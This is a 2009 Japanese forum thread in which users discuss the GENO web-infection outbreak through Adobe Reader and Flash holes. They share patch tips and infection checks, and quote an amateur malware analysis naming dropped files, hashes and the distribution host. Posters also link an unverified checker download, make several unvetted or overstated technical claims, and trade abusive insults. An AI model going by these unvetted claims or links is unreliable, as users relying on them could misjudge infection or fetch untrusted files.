良かったね、溜飲を下げることができて。おめでとう。君たちの選択は正しかったと思うよ。うん。wwwwwwwww
406 桜(大阪府):2009/05/17(日) 22:04:33.10 ID:FUxhLkqA
>>397
キャッシュじゃねえの?
407 カタクリ(千葉県):2009/05/17(日) 22:05:51.73 ID:KLsPwtoF
>>401
なぜにアラビア
408 ポレオニウム・ボレアレ(チリ):2009/05/17(日) 22:05:56.31 ID:4PpTUGrX
もっとこう、社会がめちゃめちゃになるようなウイルス作れんのかね
頭悪いんだな
409 水芭蕉(関西地方):2009/05/17(日) 22:06:00.56 ID:uzPXcwuq
>>397
インスコ直後なら再起動しなさい
410 パンジー(福岡県):2009/05/17(日) 22:06:24.01 ID:B4cic04o
>>396
ああそれとありがとう
さて周りの人間に対策方法などを伝えたりするか…
411 カンパニュラ・アーチェリー(埼玉県):2009/05/17(日) 22:07:42.01 ID:k6FYHCKo
>>383
同人板が今旬
412 コメツブツメクサ(愛知県):2009/05/17(日) 22:07:43.55 ID:H5zMec2W
GENOウイルスチェッカー
危険度1000%
超絶危険なURLです。友人のPCを壊すのに利用しましょう!
絶対に踏んではいけません。
評価ミス報告
413 デージー(神奈川県):2009/05/17(日) 22:08:31.10 ID:icmEkHLo
>>397
最新バージョンは10,0,22,87
↓確認してみ
http://www.adobe.com/jp/support/flashplayer/ts/documents/tn_15507.htm
414 シンフィアンドラ・ワンネリ(空):2009/05/17(日) 22:12:28.56 ID:Mxxf0mNV
同人板は腐女子が未曾有の恐怖に叩き込まれているな。
415 ビオラ(東京都):2009/05/17(日) 22:14:53.26 ID:J0yUII5Y
同人板普段行かないけどあのスレは結構親切だな
416 サイネリア(関東・甲信越):2009/05/17(日) 22:14:57.44 ID:NrIozNFe
フラッシュプレイヤーは10 0 22 87
アドビも最新版にした
noscriptもadblockも入れた
UACも有効
これで大丈夫な筈だよね
417 ボタン(東日本):2009/05/17(日) 22:16:51.08 ID:88zgqtOm
改竄されたページのスクショとかってないの?
GENOとかどんなんなってたのか見てみたい
418 ヘラオオバコ(東日本):2009/05/17(日) 22:17:45.69 ID:tdaWshCr
この手の騒ぎがくるといろいろ調べるから知識が増えてちょっと嬉しい。
419 ダンコウバイ(青森県):2009/05/17(日) 22:18:39.75 ID:mmnPIZEh
あるサイト危険度50%で安全って言われたけど、大丈夫なのか?w
420 ねこやなぎ(埼玉県):2009/05/17(日) 22:18:50.14 ID:OE/Nzau1
421 ねこやなぎ(千葉県):2009/05/17(日) 22:19:05.93 ID:/hTo2UfK
>>416
そこまで対策したからと言って[大丈夫]の一言で片付けるのは危ないよ
422 サトザクラ(チリ):2009/05/17(日) 22:19:17.09 ID:rDmPPqGI
>>418
        /⌒ヽ   / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
      ∧,,∧^ω^) < このスレ定期的に立つNE!
      /・ ・`ヽと )   \_____________
     (。。ノ  しヽ
      /ヽ /  ノ
     ( へ /|.|
      ヽヽ| | U
        | | パカパカ
        U
423 ナニワズ(catv?):2009/05/17(日) 22:20:45.38 ID:FjzzEBIm
レジもコマンドも開けた
とりあえず安心
424 カタクリ(東京都):2009/05/17(日) 22:20:55.08 ID:bdUs8V1d
さっきseibidoshuppan踏んじまったけどなぜか大丈夫だった
425 ヒイラギナンテン(福岡県):2009/05/17(日) 22:21:10.07 ID:7lpY9cd9
感染したらどうなんの?
426 キブシ(長屋):2009/05/17(日) 22:22:23.52 ID:hgvJMr2D
>>425
かゆうま
427 ミミナグサ(愛知県):2009/05/17(日) 22:22:52.76 ID:Qtky1iiK
>>425
注目の的になる
428 ショウジョウバカマ(福島県):2009/05/17(日) 22:22:58.73 ID:ZA1v3mO9
>>415
つかν速民は他の板に行かないほうがいい。
メシウマとか情弱とか語って煽ってるマジキチ=ν速民ってのが他の板では常識なんだよw
429 ナニワズ(catv?):2009/05/17(日) 22:23:05.73 ID:FjzzEBIm
firefoxにしててよかった
430 サトザクラ(チリ):2009/05/17(日) 22:23:50.24 ID:rDmPPqGI
>>425
GOODLUCK!!BABY!!
431 フデリンドウ(アラバマ州):2009/05/17(日) 22:24:54.20 ID:5GYYwEGs
>>423
最近の亜種は、レジもコマンドも開けられるようだよ。
432 アルストロメリア(神奈川県):2009/05/17(日) 22:25:00.03 ID:I8b7rFs7
>>425
再インスコの理由が出来る
433 サンシュ(東京都):2009/05/17(日) 22:26:14.47 ID:TVbfxF0n
>>425
おちんちんにブツブツが出来る
434 カタクリ(東京都):2009/05/17(日) 22:27:30.27 ID:bdUs8V1d
プニルだったから大丈夫だったのかな
再起動したけど問題なし>>362これも問題なし
435 オキザリス(アラバマ州):2009/05/17(日) 22:27:43.99 ID:drQ3XXQE
OS、antivirとflash更新してきた
readerは元から使ってないsumatraでおk
これで当分様子見
436 マーガレット(アラバマ州):2009/05/17(日) 22:28:21.36 ID:NNAeying
>>431
レジストリエディタが開けるんだったら、直すのもそんなに難しくないわけだがw
437 ナノハナ(アラバマ州):2009/05/17(日) 22:29:40.20 ID:SPGYBJAI
>>425
乗るしかないこのビッグウェーブに。
438 センダイハギ(アラバマ州):2009/05/17(日) 22:31:35.94 ID:OyHCHJOU
Adobe Reader の最新版って9.1.1なんだろ?
ふつうにサイト行っただけじゃ9.1しかないじゃん
わかりにくすぎだろ
439 サポナリア(dion軍):2009/05/17(日) 22:33:28.46 ID:6iiG9LKF
>>438
helpのupdateの有無みたいなとっからできるよ
440 デルフィニム(愛知県):2009/05/17(日) 22:33:46.11 ID:yIUHgeE2
>>365
個人サイト持ちが多い腐女子にとっては驚異的なウイルスであると容易に想像できる。
441 バーベナ(群馬県):2009/05/17(日) 22:34:10.00 ID:/94U3SfW
XPSP2なんだがSP3にしたほうがいいのか教えろクズども
442 フデリンドウ(アラバマ州):2009/05/17(日) 22:34:59.70 ID:5GYYwEGs
>>436
そういわれても、確かめようがなくて困っているのですよ。

926 名前:GENO[] 投稿日:2009/05/17(日) 21:50:07 ID:1XXBwaecO (携帯)
最近の亜種だとcmdもregeditも普通に出来るみたいってのはマジ?

963 名前:GENO[sage] 投稿日:2009/05/17(日) 22:02:55 ID:uEd/QI2I0 (PC)
>>926
自分じゃないが、知人は、プロンプトもレジストリエディタも開いたけど、
sql〜は1300kbぐらいのヤバイサイズだったらしいから、そうかもしれん。
443 ねこやなぎ(埼玉県):2009/05/17(日) 22:35:04.11 ID:OE/Nzau1
>>441
え、ν即民はSP1だろ・・・?
俺釣られちゃったかな?
444 パンジー(福岡県):2009/05/17(日) 22:35:14.90 ID:B4cic04o
>>438
Adobe Readerを起動→ヘルプ→製品向上でいい筈
445 センダイハギ(アラバマ州):2009/05/17(日) 22:35:14.93 ID:OyHCHJOU
>>439
重大なことなんだから、もっと前面に注意書き出しとくべきだと思うんだがな
446 トベラ(東京都):2009/05/17(日) 22:36:44.21 ID:Ugp/UXZi
adobeむかつくな相変わらず。。
447 サポナリア(dion軍):2009/05/17(日) 22:37:03.09 ID:6iiG9LKF
>>445
たしかにわかりにくい
448 サポナリア(アラバマ州):2009/05/17(日) 22:38:44.56 ID:/aQAF9uz
未だにドリームキャストでネットしている俺は勝ち組だな。
ウイルス?何それ?www
449 ポピー(コネチカット州):2009/05/17(日) 22:39:02.36 ID:VuAFQuDp
こんな騒ぎになってる割には某巨大インタネット掲示板は感染してないんだね
450 ボタン(コネチカット州):2009/05/17(日) 22:39:13.28 ID:cSzj4cNp
愛の妖精ぷりんてぃんが感染しとるぞww
451 オンシジューム(埼玉県):2009/05/17(日) 22:39:55.49 ID:EBu8oFSG
>>450
あのおばちゃんじゃあ治せないんじゃねえかなw
452 プリムラ・ビオラケア(関西地方):2009/05/17(日) 22:40:18.64 ID:CGz5lqbx
感染してる同人サイトって、腐女子サイトがほとんどじゃねーの?
453 ヤエヤマブキ(アラバマ州):2009/05/17(日) 22:40:25.17 ID:pinSpSMk
454 ツルハナシノブ(東京都):2009/05/17(日) 22:41:34.42 ID:nDRzwdza
しかも21.8Mもある
455 アズマギク(大阪府):2009/05/17(日) 22:41:39.82 ID:FDFilUKO
愛生会病院も感染してるな
456 ツルハナシノブ(東京都):2009/05/17(日) 22:42:19.11 ID:nDRzwdza
みんな感染サイトの主に感染のこと報告してる?
457 カタクリ(東京都):2009/05/17(日) 22:42:20.40 ID:bdUs8V1d
>>441
XP home SP3だけどGENO踏んでも大丈夫だった
458 サンダーソニア(青森県):2009/05/17(日) 22:43:10.19 ID:kOs0VXBG
最新版にアップグレードできないMeと98は座してゲノ待つしか無いのですか
そうなのですか
フラッシュ見ないとかpdf開かないとかそんなんじゃ駄目なんだよな
思いきって消すしかないかフラッシュプレイヤーとアクロバットリーダー
しかしカタカナで書くとより情弱が強調されるNE
459 ユキノシタ(dion軍):2009/05/17(日) 22:44:03.65 ID:yYveNWCW
401 192.168.0.774 [sage] 2009/05/17(日) 22:38:51 ID:N9SKEU4J0
 え〜、gnomeの人のおかげで挙動の予想がついてきたので、ちょっとexeの方を実行した時に
 作成されるファイルを仮想PCで確保してみました。
 ベンダーに提出するかどうかの判断は各自にお任せします。(一応、KasperskyとAVIRAには送ってあります。)

 muvl.exe (元の名前 muvl.nug) - ランダム作成らしい。
  MD5 : 3862b349b9b5c9283925e181ff9f5bf8
  http://www.virustotal.com/jp/analisis/6ee378acae1dfede9be4c3949ee56b1a (2/40)

 sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
  MD5 : 34cd61d83853e511f0a28027f639a1c9
  http://www.virustotal.com/jp/analisis/395c9f2d6d6d38525fb24b3722664bfa (0/40)

 muvl.exeは、中身に合わせて拡張子を変えてあります。(ベンダー提出時に捨てられないように)

 gnomeの人の所の話では、一定時間毎に自己書き換えをして潜伏するそうなので、シグネチャで
 対応できる可能性はかなり低そうですが、出さないよりはマシかもしれません。

 sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
 感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
 ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

 あと、悪い話ですが、SymantecでもKasperskyでも、オンラインスキャンではコイツに感染していることがわかりません。
 バッチリ感染した仮想PCをオンラインスキャンしてみたのですが、どちらも何も検出しませんでした。

 このマルウェアは、感染時に元の実行ファイル(martuz.cnから落ちてくるxxxx.exe)の方を消去(証拠隠滅)
 するようになっているので、一度感染すると、本体の自己書き換えもあるので、検出はほぼ不可能と思われます。

 タチ悪すぎ...
460 シャクナゲ(福島県):2009/05/17(日) 22:44:53.79 ID:EFbyQgpL
GENO踏みまくったけど、いまんところ大丈夫な俺
火狐使用だったのが幸いしていたのか
461 カンパニュラ・ベリディフォーリア(沖縄県):2009/05/17(日) 22:45:15.08 ID:Kdnjyc4h
>>458
ウィルスの方も面倒くさくて対応してない可能性がある
462 タマザキサクラソウ(栃木県):2009/05/17(日) 22:46:05.34 ID:kmiyNyNB
>>459
まるでHIVだな
463 シャクナゲ(福島県):2009/05/17(日) 22:46:49.59 ID:EFbyQgpL
>>459
ひぇぇ
マジかよ。たち悪杉じゃねーか
464 アズマギク(大阪府):2009/05/17(日) 22:48:31.28 ID:FDFilUKO
このウイルス作った奴すごいな
465 パンジー(福岡県):2009/05/17(日) 22:49:09.36 ID:B4cic04o
>>459
感情がある人間が造ったと思えない!
鬼!悪魔!鬼畜ーーー!!
466 センダイハギ(アラバマ州):2009/05/17(日) 22:49:29.22 ID:OyHCHJOU
>>458
Meと98なんてもともと個人情報入れてネットに繋がないだろ
GENOじゃなくても情報除かれ放題じゃないの?
467 オオイヌノフグリ(チリ):2009/05/17(日) 22:50:00.96 ID:02/xJYag
>>459
こりゃゲートになってるAdobeをなんとかするのが一番手堅いかもわからんねw
もうされてるんだけど。

仮に別の脆弱性を付いてくるようになったら手がつけられんぞw
468 ハクモクレン(静岡県):2009/05/17(日) 22:50:16.92 ID:7oZmhocx
>>200
それもだめなのか
469 シンフィアンドラ・ワンネリ(空):2009/05/17(日) 22:52:17.52 ID:Mxxf0mNV
自己書き換えしてセキュリティーソフトのパターンマッチング回避しているのか。
タチワルだな。
470 センダイハギ(アラバマ州):2009/05/17(日) 22:53:58.33 ID:OyHCHJOU
Adobe最新にして、firefoxにでもすりゃとりあえずはいいのか?
こえーよ
471 タマザキサクラソウ(栃木県):2009/05/17(日) 22:55:00.31 ID:kmiyNyNB
いや、NT5系が集団感染しているのを見ているとメシウマとさえ思えてくる。
我が家のPC7台中5台がXPなんだけどね。残り2台がVista。
472 西洋オキナグサ(宮城県):2009/05/17(日) 22:55:46.45 ID:RSDK8rRx
有志が作って下さった
感染チェックツール
http://3rd.geocities.jp/tdnskbn/dat/genochecker.zip
機能
1 ) cmd.exeの起動確認
2 ) regedit.exeの起動確認
3 ) sqlsodbc.chmのファイルサイズ確認

ZIPを解凍するとgeno.batが出て来るので、
それを実行すれば簡単に感染しているのかどうかチェックできる。
心配な人はgeno.batをメモ帳で開いてみれば安全なファイルだとわかります。

チェック後の起動画面。
http://www.rupan.net/uploader/download/1242563513.png
473 シザンサス(東京都):2009/05/17(日) 22:56:08.86 ID:9RXknMOk
同人板のやつら必死すぎだろw
感染サイトのアド書き込んだだけで逮捕だとよwwww
474 スズナ(大阪府):2009/05/17(日) 22:56:12.43 ID:JO1RLV1L
>>446
たぶん、ウィルス作ったやつもむかついてたんだろうw
475 サイネリア(関東・甲信越):2009/05/17(日) 22:56:20.72 ID:NrIozNFe
このウィルス作った奴は忍者だろ
476 ダイセノダマキ(大阪府):2009/05/17(日) 22:57:00.73 ID:3Z/DBOwd
>>459
これマジならヤバイぞ・・・
477 スズナ(福井県):2009/05/17(日) 22:57:21.01 ID:aThEtNN3
とりあえずメインPCがVistaだからUACオンにしたわ
UAC入れると他PCとのファイル共有がめんどいんだよなあ
あーあ
478 桜(大阪府):2009/05/17(日) 22:58:02.16 ID:FUxhLkqA
Sumatra PDFの俺には関係ないぜ!
479 オオイヌノフグリ(チリ):2009/05/17(日) 22:59:18.48 ID:02/xJYag
自己書き換えのパターンが周期的ならマダ対応の仕方もあるだろうけどそこらへんどうなんだろ
480 スズナ(不明なsoftbank):2009/05/17(日) 23:00:15.91 ID:7wzkSgqs
>>477
ノートンuac使えば?
481 ヒヤシンス(関西地方):2009/05/17(日) 23:04:01.45 ID:QuvHDITk
>>461
いやそんなadobeの脆弱性にOSの新旧は
VistaがとにかくUAC(だっけ)でガードされてるってだけではないのか
アクロバットリーダーなんか5だった、もう泣くしか無い
当然ヘルプ開いてもアップデートへのリンクなんか無いっていう
>>466
そんなもんなのか。じゃあ今更騒いでも仕方ないのかな。でも
クレカとかネットバンクとか使ってないから覗かれても住所氏名位なのは
変わらないとしても、サイト持ってるから改竄されるのが今回は恐ろしい
FTPじゃなくてファイルマネージャ使ったら大丈夫なんだろうか
482 タニウズキ(神奈川県):2009/05/17(日) 23:04:56.72 ID:RddtXoK4
UACより、そもそも管理者権限で使うなよ
管理者権限はアプリのインストールとかシステムいじるときだけにして、
普段は一般ユーザーで使え
483 サンシュ(東京都):2009/05/17(日) 23:04:59.31 ID:TVbfxF0n
自己書き換えで姿が変わるんならGENO(ギニュー)ウィルスと名づけよう
484 藤(東京都):2009/05/17(日) 23:05:37.37 ID:Se289yeX
今回の件とは関係無いけど
同人板って、板自体が慢性的にウィルスか何かの被害にあってるみたいな
書き込みをよく見掛けるんだけど、
あれって本当なんかな。
本当なら運営が放置してるってのがよく分からん
485 スズナ(福井県):2009/05/17(日) 23:05:48.30 ID:aThEtNN3
>>480
ノートン製品には意地でも頼らないジャスティス
486 オウギカズラ(大阪府):2009/05/17(日) 23:05:48.15 ID:b2j55ziw
なぜvista付属のUACがそこまで忌み嫌われるのか

>>482
同意 そこにパスつきしたら最強
487 リナリア アルピナ(中部地方):2009/05/17(日) 23:06:50.06 ID:PA1MHOB9
488 タチツボスミレ(静岡県):2009/05/17(日) 23:07:23.32 ID:OUWbXyvU
やばい
ヴぃすた欲しくなってきた
489 姫カンムリシャジン(catv?):2009/05/17(日) 23:07:23.57 ID:VrvJr8Qg
>>486
あんなものを有難がっている方がおかしいはwww
490 水芭蕉(アラバマ州):2009/05/17(日) 23:07:51.20 ID:963+B9KC
まぁ「踏んだけどなんともならなかった」と言うXP厨には
あとできっついお仕置きな請求書とか届いたりすんですかねぇw?
491 ツルハナシノブ(東京都):2009/05/17(日) 23:07:58.42 ID:nDRzwdza
>>482
いまの環境をそのまま使う場合、
まず管理者アカウントをもう一つ作って、それから、現在の管理者アカウントを一般に落とせばいいの?
492 ヒナゲシ(大阪府):2009/05/17(日) 23:08:55.79 ID:hCg8v3lR
これってXP厨ならpdfとswfの関連付けを外しておくだけでいいんじゃないの?
493 オウレン(アラバマ州):2009/05/17(日) 23:09:04.17 ID:weZpGoA9
VistaのUACはウザイけど、やはり守りは堅かった
494 タニウズキ(神奈川県):2009/05/17(日) 23:09:40.32 ID:RddtXoK4
>>491
それでいいんじゃね?
495 ニオイタチツボスミレ(dion軍):2009/05/17(日) 23:09:42.13 ID:8ngG70Du
>>425
汗水流し働いてゲットした金が奪われる可能性UP
PCブルースクリーンで起動不可
竹島にテレポート
金正男が北朝鮮の後継者になる
496 姫カンムリシャジン(catv?):2009/05/17(日) 23:10:02.02 ID:VrvJr8Qg
UACがあるから感染しないわけじゃねえだろww
情弱乙
497 キクザキイチゲ(青森県):2009/05/17(日) 23:10:03.30 ID:gFEmaE1I
UACは鬱陶しいけどちゃんと警告すべきものを警告してくれてるからそんな悪い機能じゃない
498 チャボトウジュロ(catv?):2009/05/17(日) 23:10:03.61 ID:nL61Hsx3
現在のセキュリティーソフトはぶっちゃけて言えば特定されたウイルスの型を
照合してする方法だから、
一定時間ごとに型が変わる奴を検出するのは難しいよな。
殆どの奴が無力化されている状態だろ。
499 クロッカス(福井県):2009/05/17(日) 23:11:08.93 ID:fHy47g7z
いろいろ踏んできたけどXP&IE8じゃなんともないな
500 オウギカズラ(大阪府):2009/05/17(日) 23:11:12.58 ID:b2j55ziw
>>489
なんで?MacやLinuxだってUACあるだろ
あれが標準になるんだけど
うっとおしくもないし
501 スズナ(関西地方):2009/05/17(日) 23:11:20.90 ID:w3dprot+
>>496
こんな情弱みたことねーわw
502 ヤエザクラ(愛知県):2009/05/17(日) 23:12:11.17 ID:T8veyjSX
???????? ??? ??????? ?? ????? ????????? ??????? ?? ???? ??? ?????
????????? ???? ????????? ??? ??????? ?????? ?? ??????? ? ??? ?????? ????? ???? ?????? ??? ???? ????????? ??????.
??????? ????? ?????? ????? ???? ? ???? ?????? ?????????.
503 マツバウンラン(岡山県):2009/05/17(日) 23:12:45.11 ID:kRX/rFYX
chromeは砂箱で安全なんでしょ?
504 ガザニア(大阪府):2009/05/17(日) 23:13:17.23 ID:MWvflWFs
Vista厨が必死なスレになってる
505 ユキワリコザクラ(長屋):2009/05/17(日) 23:13:39.10 ID:2v/DXYcw
水際で防ぐしかないってどんだけインフルなんだよ。
506 チドリソウ(関東):2009/05/17(日) 23:13:46.40 ID:t0SzZMWL
adobe重い…更新出来ね…イライラ
507 ハマナス(北海道):2009/05/17(日) 23:14:03.34 ID:uImdzoyW
>>505
隔離できないからインフル以上だな
508 マツバウンラン(三重県):2009/05/17(日) 23:14:27.12 ID:SEg/+KwM
ネットの情報を鵜呑みにしないで素直にVista買ってよかった
定員さんありがとう
509 ビオラ(関西):2009/05/17(日) 23:14:28.39 ID:mILEUvOQ
火狐でも無理なのか?
510 オオイヌノフグリ(チリ):2009/05/17(日) 23:15:14.54 ID:02/xJYag
もうAdobeのうちインスコされてるものを最新版にしてあとはへんなもの踏まないことを祈るしかないな

ていうかどこのベンダもまだ対応してないわけ?
むしろ気づいてなかったり?
511 サイネリア(関東・甲信越):2009/05/17(日) 23:15:20.89 ID:NrIozNFe
今一番必死なのはvistaを道連れに出来なかったXP厨だと思うがw
512 バーベナ(群馬県):2009/05/17(日) 23:15:39.38 ID:/94U3SfW
>>459
ひでえwwwwwここまでとはw
513 オウギカズラ(大阪府):2009/05/17(日) 23:16:09.40 ID:b2j55ziw
成美堂って英語の構文150のとこか
514 水芭蕉(アラバマ州):2009/05/17(日) 23:16:29.63 ID:963+B9KC
つかVistaなんて入れてる物好き厨は普通にXP何台か持ってるから
515 サポナリア(dion軍):2009/05/17(日) 23:17:25.37 ID:6iiG9LKF
>>459
だれかこれ噛み砕いて説明してくれませんか
516 ユキノシタ(関東地方):2009/05/17(日) 23:18:55.27 ID:fLKMb4aM
>>515
ウイルス駆除ソフトはウイルスの型をデータと照合して消すけど
こいつはその型をめまぐるしく変えて尻尾をつかませないってこと
517 タマザキサクラソウ(栃木県):2009/05/17(日) 23:19:22.14 ID:kmiyNyNB
>>485
フリーツールだよ。試作段階の。
便利なツールは使わなきゃ損。
518 ウグイスカグラ(大阪府):2009/05/17(日) 23:19:30.09 ID:MExLXkWF
なんともはや
519 タツナミソウ(青森県):2009/05/17(日) 23:19:38.35 ID:eddIy6lX
まるでHIVだな
たちが悪い
520 チチコグサ(関東):2009/05/17(日) 23:19:44.55 ID:txLouzWF
>>459
つまりsqlsodbc.chmが改変されてきゃ大丈夫なんだな?
521 オニタビラコ(静岡県):2009/05/17(日) 23:20:04.94 ID:jNe7f5fc
VistaはセキュアOS
セキュアOS(Secure OS)とは、セキュリティを強化したオペレーティングシステムのことである。
厳密な定義は存在していないが、強制アクセス制御(Mandatory Access Control:MAC)機能及び、
最小特権を実現する機能を備えたものをそう呼ぶことが一般的である。
UACは、強制アクセス制御でかつ、最小特権を実現する
これを嫌がってるのは情弱のそしりを免れない

ちなみにユーザーアカウントでも、必要なときにはUACで管理者モードに昇格できるので、
普段はユーザーアカウントで使用するのが正しい使い方
しかし普段から管理者アカウントで使っても、UACが強制アクセス制御と最小特権を実現する不思議
これはUNIXやLinux以上の高機能である
522 菜の花(宮城県):2009/05/17(日) 23:20:06.61 ID:FYSoDu6x
ここまで手の込んだウィルス作る意図って…
523 ユキノシタ(関東地方):2009/05/17(日) 23:21:33.96 ID:fLKMb4aM
犯人捕まってもIT各社から高待遇で迎えられるんだろーな
マフィアのPCぶっ壊して私刑にあえばいいのに
524 ハルジオン(dion軍):2009/05/17(日) 23:22:56.44 ID:WSFAe35y
公明党ブラウザは大丈夫ですか
525 タマザキサクラソウ(栃木県):2009/05/17(日) 23:24:22.04 ID:kmiyNyNB
>>515
かいせんきってくびつってしね
526 オニタビラコ(静岡県):2009/05/17(日) 23:24:34.00 ID:jNe7f5fc
>>459
sqlsodbc.chm - ただのダミーファイルです。(中身は無意味なテキストと空白)
 sqlsodbc.chmの方はダミーファイルなので、マルウェアではありません。
 感染すると、sqlsodbc.chmがこれに置き換えられるという意味で参考に添付してあります。
 ファイルサイズは1,323バイトで、オリジナルファイルと置き換えられます。

ってことは、ダミーファイルのsqlsodbc.chmが、正規のオリジナルファイルと同じファイルサイズにされたら、
>>472のファイルサイズ確認は使えないのね?
527 シナミズキ(兵庫県):2009/05/17(日) 23:25:55.46 ID:Qi4XGox+
>>526
ハッシュ値
528 タマザキサクラソウ(栃木県):2009/05/17(日) 23:27:20.36 ID:kmiyNyNB
>>520
VistaならWindows\Help\mui\その下に0409、0411の2つのフォルダがあるけど、
要はデータソースウィザードのヘルプファイル。正常にオープンできればOKと認識している。
529 サンシュ(東京都):2009/05/17(日) 23:28:16.52 ID:TVbfxF0n
>>515
ボディーチェーンジ!の使いすぎで本来の姿を忘れてしまった
530 オウギカズラ(大阪府):2009/05/17(日) 23:28:19.17 ID:b2j55ziw
f639afde02547603a3d3930ee4bf8c12

上が正規ファイルのハッシュ
これがあってれば大丈夫
531 バラ(catv?):2009/05/17(日) 23:28:51.14 ID:MPEMpk02
>>99
GENO感染乙
532 マツバウンラン(岡山県):2009/05/17(日) 23:28:58.62 ID:kRX/rFYX
>>526
ダミーファイルって良く解らないけど
今はたまたまsqlsodbc.chmだけど
他のファイルに変更されたらそれだけ監視しててもダメだよな
ウィルスの挙動に関係ないならそのファイル書き換える必要ないような気がするけど
これはどういうこった
533 マンサク(静岡県):2009/05/17(日) 23:29:14.78 ID:QN8A0TOe
なんだかエライこと起きてたんだな
情弱でアホな俺にはこういう会話は尊敬する

wikiで見たら一応感染してないみたいだから後は祈るしかない

とりあえず怪しいところは見なきゃいいんですよね 先生
534 イワウチワ(鳥取県):2009/05/17(日) 23:29:17.18 ID:avsNBbVp
そもそもsqlsodbc.chmを書きかたら意図は何なのか
535 ユリオプスデージー(北海道):2009/05/17(日) 23:30:33.42 ID:pcT6KiTg
おいお前ら正直に答えてくれ
飽きてきただろ
536 ナノハナ(愛媛県):2009/05/17(日) 23:30:39.44 ID:fkFcHUl0
sqlsodbc.chm のファイルサイズ49.5KBってなってるけど大丈夫だよね?
537 マツバウンラン(岡山県):2009/05/17(日) 23:31:14.63 ID:kRX/rFYX


433 名前:401[sage] 投稿日:2009/05/17(日) 23:26:41 ID:N9SKEU4J0
>>416
嫌なことに、特に異変がない。 cmd.exeも普通に実行できるし、レジストリエディタも問題なく実行できる。
少なくとも、現在配布されているバージョンのウイルスについては、cmd.exe,レジストリエディタによる確認は不可能。
確認は、sqlsodbc.exeだけが頼りですね。

あと、動作が重くなったり、おかしくなった感じも特にない。仮想PCで重さの変化を感じないのだから、
実機ならまず気が付かんでしょう。


これ、今出回っているヤツだと、確実に感染したことに気がつかんと思う。 同人板その他、パンデミック状態になったの理解できるわ。
538 ナズナ(埼玉県):2009/05/17(日) 23:31:44.97 ID:H1zPxW5H
2chに引きこもって対応待ち
539 カタクリ(東京都):2009/05/17(日) 23:31:54.85 ID:bdUs8V1d
マジレスほしかったが今んとこ問題ないし寝るか…
540 タマザキサクラソウ(栃木県):2009/05/17(日) 23:32:21.37 ID:kmiyNyNB
>>536
ダブルクリックして開ければOKだと思う。ウィルスの踏み台にされた後には意味ないものになってるはずだから。
541 イワウチワ(鳥取県):2009/05/17(日) 23:33:16.87 ID:avsNBbVp
潜伏期間ってないの?
542 ユキノシタ(関東地方):2009/05/17(日) 23:33:46.73 ID:fLKMb4aM
時限式とか恐い想定するなよ・・・
543 フデリンドウ(アラバマ州):2009/05/17(日) 23:34:17.76 ID:5GYYwEGs
>>539
感染しているかどうかどうやってチェックした?
今はやっているウイルスはcmdもレジも開けるだよ。
sqlsodbc.chmの変化しか感染したかどうか分からない。
544 ユキノシタ(dion軍):2009/05/17(日) 23:34:18.20 ID:yYveNWCW
>>532
sqlsodbc.chmという明確な診断方法を予め周知させておいて、
ある日sqlsodbc.chmへの書き換えを行わない亜種を流して混乱させる…とか
とは言っても、sqlsodbc.chmが変わらない例は既にあるんだよな
545 ジュウニヒトエ(アラバマ州):2009/05/17(日) 23:34:46.01 ID:pHEo3uw6
亜種にしろなんにしろアドビの脆弱性狙ったものなら
アップグレードするなりアンインスコしとけば平気ですか?
546 シャクナゲ(福島県):2009/05/17(日) 23:35:12.39 ID:EFbyQgpL
>>536
sqlsodbc.chmのCRC32、MD5、SHA1を比べてみる
547 リナリア(アラバマ州):2009/05/17(日) 23:35:20.01 ID:7GTaYlwU
感染確認と各アップデートを済まして
後は危険IPのブロックとやらをするだけなんだが
BBR-4HGのIPフィルタルールの設定方がよく分からんのでパス。。

まあ、情弱の俺でも最低限の事はやったから
騒動が収束するまでは外出は控え専ブラで2chに引きこもるか。
548 スズナ(東京都):2009/05/17(日) 23:36:06.42 ID:yo6/k/EH
>>543
俺が感染した奴はsqlsodbc.chmも変わらなかった
549 マツバウンラン(岡山県):2009/05/17(日) 23:36:59.44 ID:kRX/rFYX
>>537の訂正


435 名前:401[sage] 投稿日:2009/05/17(日) 23:28:50 ID:N9SKEU4J0
>>433
>確認は、sqlsodbc.exeだけが頼りですね。

exeじゃねえ... sqlsodbc.chm ですな。
550 シロバナタンポポ(東京都):2009/05/17(日) 23:37:01.87 ID:ARglw2xD
ちょっとまてよ、FLASHを最新にするって事はPLAYER10かよ、9じゃなくて。

これはFLASH10の普及が遅れてるADBEOの陰謀だな
551 オキザリス(東京都):2009/05/17(日) 23:37:31.07 ID:OT2LLMTM
>>515
簡単に言うと、大抵のウイルス対策ソフトだと
パターンファイルを頻繁に更新しないと発見できないから困ったね
ということだ。
552 オキザリス(東京都):2009/05/17(日) 23:38:32.77 ID:OT2LLMTM
>>522
この結果をベースに、もっと発見されづらいトロイを
仕込んでボッとネットワークの作成って事じゃないかな。
553 タツタソウ(長屋):2009/05/17(日) 23:38:37.68 ID:kXthrkky
とりあえず思いっきり感染してるんだが
専ブラのdatとかもアウトになってるものなのか?

バックアップ取ってねえよぉ
554 オウギカズラ(大阪府):2009/05/17(日) 23:38:40.47 ID:b2j55ziw
>>536
右クリプロパティやってみたら解決するよ
555 シロバナタンポポ(東京都):2009/05/17(日) 23:39:16.89 ID:ARglw2xD
てか、いまだにFTPでサーバにアクセスしてるヤツ自体の存在がダメじゃないの?
SFTPとかSSH使えよ。
556 イカリソウ(大阪府):2009/05/17(日) 23:39:37.76 ID:q6KyqPC+
>>544
それどうやって感染確認できるんだ?w
557 ユキノシタ(dion軍):2009/05/17(日) 23:40:09.62 ID:yYveNWCW
>>537
これ本当にXP終了なんじゃないか?
558 オオイヌノフグリ(チリ):2009/05/17(日) 23:40:32.50 ID:02/xJYag
ていうかなんで無意味にファイルを書き換えるんだろうな
そのファイルに自己書き換えのキーがおかれてるとかじゃないの?
559 スイセン(東日本):2009/05/17(日) 23:41:05.27 ID:pSBKelp4
>>458
Avast!があるじゃないか
560 ヤエザクラ(神奈川県):2009/05/17(日) 23:41:21.83 ID:DWX73euC
四月末にSalityで散々酷い目に遭った次はこれか・・・
恐ろしくてマトモにネットできんなw
561 プリムラ・インボルクラータ(北陸地方):2009/05/17(日) 23:41:27.49 ID:UVBgy5IM
adobe readerをアンインストールする手はあり?
